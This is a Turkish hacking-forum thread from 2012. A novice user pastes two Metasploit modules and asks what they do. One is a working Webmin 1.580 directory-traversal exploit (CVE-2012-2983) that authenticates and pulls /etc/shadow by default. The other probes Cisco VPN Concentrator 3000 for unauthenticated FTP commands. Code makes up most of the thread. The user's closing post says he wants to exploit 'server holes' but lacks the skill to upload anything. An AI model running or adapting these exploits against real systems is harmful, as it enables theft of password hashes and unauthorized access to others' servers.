THT DUYURU

THT Yardım Merkezi THT Yardım Merkezi bölümünden; teknoloji ve bilişim ile ilgili her konu için yardım isteyebilirsiniz.

Seçenekler

:)Bilgi almam lazım ben ne yaptım :)

Muhammedsalih - ait Kullanıcı Resmi (Avatar)
Yeni Üye
Üyelik tarihi:
10/2012
Yaş:
41
Mesajlar:
22
Konular:
7
Teşekkür (Etti):
1
Teşekkür (Aldı):
0
Ticaret:
(0) %
2
368
16-11-2012 06:47
#1
arkadaşlar exploit sitelerinde gezinirken edit html file access çalıştırdım ve bana şu yazıları çıkardı yani iki link verdi hiç bişey anlamadım bişeye yararmı bilmem ha birde exploit komutlarını yazarken user ve şifre girmiştim
require 'msf/core'




def initialize(info = {})
super(update_info(info,
'Name' => 'Webmin edit_html.cgi file Parameter Traversal Arbitrary File Access',
'Description' => %q{
This module exploits a directory traversal in Webmin 1.580. The vulnerability
exists in the edit_html.cgi component and allows an authenticated user with access
to the File Manager Module to access arbitrary files with root privileges. The
module has been tested successfully with Webim 1.580 over Ubuntu 10.04.
},
'Author' => [
'Unknown', # From American Information Security Group
'juan vazquez' # ****sploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['OSVDB', '85247'],
['BID', '55446'],
['CVE', '2012-2983'],
['URL', 'http://www.americaninfosec.com/research/dossiers/AISG-12-002.pdf'],
['URL', [COLOR="rgb(255, 140, 0)"]'https://github.com/webmin/webmin/commit/4cd7bad70e23e4e19be8ccf7b9f245445b2b3b80'][/COLOR]
],
'DisclosureDate' => 'Sep 06 2012',
'Actions' =>
[
['Download']
],
'DefaultAction' => 'Download'
))

register_options(
[
Opt::RPORT(10000),
OptBool.new('SSL', [true, 'Use SSL', true]),
OptString.new('USERNAME', [true, 'Webmin Username']),
OptString.new('PASSWORD', [true, 'Webmin Password']),
OptInt.new('DEPTH', [true, 'Traversal depth', 4]),
OptString.new('RPATH', [ true, "The file to download", "/etc/shadow" ])
], self.class)
end

def run

peer = "#{rhost}:#{rport}"

print_status("#{peer} - Attempting to login...")

data = "page=%2F&user=#{datastore['USERNAME']}&pass=#{datastore['PASSWORD']}"

res = send_request_cgi(
{
'method' => 'POST',
'uri' => "/session_login.cgi",
'cookie' => "testing=1",
'data' => data
}, 25)

if res and res.code == 302 and res.headers['Set-Cookie'] =~ /sid/
session = res.headers['Set-Cookie'].scan(/sid\=(\w+)\;*/).flatten[0] || ''
if session and not session.empty?
print_good "#{peer} - Authentication successful"
else
print_error "#{peer} - Authentication failed"
return
end
else
print_error "#{peer} - Authentication failed"
return
end

print_status("#{peer} - Attempting to retrieve #{datastore['RPATH']}...")

traversal = "../" * datastore['DEPTH']
traversal << datastore['RPATH']
data = "file=#{traversal}&text=1"

res = send_request_cgi(
{
'method' => 'GET',
'uri' => "/file/edit_html.cgi?#{data}",
'cookie' => "sid=#{session}"
}, 25)

if (res and res.code == 200 and res.body =~ /#{traversal}/ and res.body =~ /name=body>(.*)<\/textarea>/m)
loot = $1
f = ::File.basename(datastore['RPATH'])
path = store_loot('webmin.file', 'application/octet-stream', rhost, loot, f, datastore['RPATH'])
print_status("#{peer} - #{datastore['RPATH']} saved in #{path}")
else
print_error("#{peer} - Failed to retrieve the file")
return
end

end

end
Muhammedsalih - ait Kullanıcı Resmi (Avatar)
Yeni Üye
Üyelik tarihi:
10/2012
Yaş:
41
Mesajlar:
22
Konular:
7
Teşekkür (Etti):
1
Teşekkür (Aldı):
0
Ticaret:
(0) %
16-11-2012 06:50
#2
buda yine aynı siteye ait başka bir rapor
def initialize(info = {})
super(update_info(info,
'Name' => 'Cisco VPN Concentrator 3000 FTP Unauthorized Administrative Access',
'Description' => %q{
This module tests for a logic vulnerability in the Cisco VPN Concentrator
3000 series. It is possible to execute some FTP statements without authentication
(CWD, RNFR, MKD, RMD, SIZE, CDUP). It also appears to have some memory leak bugs
when working with CWD commands. This module simply creates an arbitrary directory,
verifies that the directory has been created, then deletes it and verifies deletion
to confirm the bug.
},
'Author' => [ 'patrick' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 15389 $',
'References' =>
[
[ 'BID', '19680' ],
[ 'CVE', '2006-4313' ],
[ 'URL', 'http://www.cisco.com/warp/public/707/cisco-sa-20060823-vpn3k.shtml' ],
[ 'OSVDB', '28139' ],
[ 'OSVDB', '28138' ],
],
'DisclosureDate' => 'Aug 23 2006'))

register_options(
[
Opt::RPORT(21),
], self.class)
end

def run
connect
res = sock.get_once
if (res and res =~ /220 Session will be terminated after/)
print_status("Target appears to be a Cisco VPN Concentrator 3000 series.")

test = Rex::Text.rand_text_alphanumeric(8)

print_status("Attempting to create directory: MKD #{test}")
sock.put("MKD #{test}\r\n")
res = sock.get(-1,5)

if (res =~/257 MKD command successful\./)
print_status("\tDirectory #{test} reportedly created. Verifying with SIZE #{test}")
sock.put("SIZE #{test}\r\n")
res = sock.get(-1,5)
if (res =~ /550 Not a regular file/)
print_status("\tServer reports \"not a regular file\". Directory verified.")
print_status("\tAttempting to delete directory: RMD #{test}")
sock.put("RMD #{test}\r\n")
res = sock.get(-1,5)
if (res =~ /250 RMD command successful./)
print_status("\tDirectory #{test} reportedly deleted. Verifying with SIZE #{test}")
sock.put("SIZE #{test}\r\n")
res = sock.get(-1,5)
print_status("\tDirectory #{test} no longer exists!")
print_status("Target is confirmed as vulnerable!")
end
end
end
else
print_status("Target is either not Cisco or the target has been patched.")
end
disconnect
end
end
Muhammedsalih - ait Kullanıcı Resmi (Avatar)
Yeni Üye
Üyelik tarihi:
10/2012
Yaş:
41
Mesajlar:
22
Konular:
7
Teşekkür (Etti):
1
Teşekkür (Aldı):
0
Ticaret:
(0) %
16-11-2012 07:17
#3
anlaşılan bilgi çok kıymetli olmuş nette çoğu expol. açıklamaları net değil bir kere mantığını anlarsam gerisi gelir ama işte sadece yüzeysel şunu yap bunu yap ne yptığımızı bile çoğu zaman bilmiyorum. Çok server açıkları var ama gel görkü bişey yükleyecek kadar bilgi sahibi olmayınca ustalardan yardım almak en iyisi

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler